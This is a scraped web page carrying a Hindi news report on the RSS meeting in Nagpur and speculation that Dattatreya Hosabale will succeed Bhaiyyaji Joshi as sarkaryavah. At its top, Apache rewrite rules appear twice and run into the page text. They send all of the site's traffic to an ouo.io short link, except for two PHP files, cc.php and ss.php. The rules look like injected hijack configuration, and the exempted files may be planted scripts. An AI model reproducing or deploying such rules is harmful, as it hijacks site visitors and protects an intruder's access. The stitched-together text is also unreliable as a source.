
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 770
Nextनई दिल्ली। राष्ट्रीय स्वयंसेवक संघ की तीन साल में होने वाली अहम बैठक नागपुर में शुरू हो चुकी है। इस बैठक में संघ की अखिल भारतीय प्रतिनिधि सभा अगले सरकार्यवाह का चुनाव करेगी। अटकलें हैं कि सरकार्यवाह के रूप में भैयाजी जोशी की जगह कर्नाटक के दत्तात्रेय होसबाले का चुनाव भी करने की संभावना है। दरअसल, हर तीन साल बाद संघ की प्रतिनिधि सभा में सरकार्यवाह का चुनाव होता है। भैयाजी जोशी ने सरकार्यवाह पद की कमान 2009 से संभाल रखी है। 2015 में ही उनकी जगह दत्तात्रेय का चुनाव होने की चर्चा चल रही थी। भैयाजी जोशी के खराब स्वास्थ्य के कारण पिछले साल उनकी कुछ जिम्मेदारियां होसबाले संभाल रहे हैं।मगर, हाल ही में भोपाल में एक कार्यक्रम में भैयाजी जोशी ने अपना स्वास्थ्य बिल्कुल ठीक होने की दुहाई देते हुए खुद को सरकार्यवाह पद से मुक्त करने और यह जिम्मेदारी युवा पीढ़ी को देने की बात कही थी।
नागपुर में शुरू हुई राष्ट्रीय स्वयं सेवक संघ की अखिल भारतीय प्रतिनिधि सभा की बैठक के साथ ही संभावित अंदरूनी कुछ बदलावों को लेकर अटकलें भी तेज हो गई हैं। चुप्पी के बावजूद माना जा रहा है कि संघ के कामकाज को देखने वाले शीर्ष नेतृत्व सरकार्यवाह के पद पर नया चेहरा होगा। नए चेहरे के रूप में सह सरकार्यवाह दत्तात्रेय होसबोले को देखा जा रहा है। ध्यान रहे कि कर्नाटक से आने वाले होसबोले प्रधानमंत्री नरेंद्र मोदी के करीबी भी माने जाते हैं। यूं तो बदलाव को लेकर अरसे से चर्चा चलती रही है, लेकिन बैठक की शुरुआत में ही एक ऐसी घटना हुई जिसने इस अटकल को बल दे दिया है।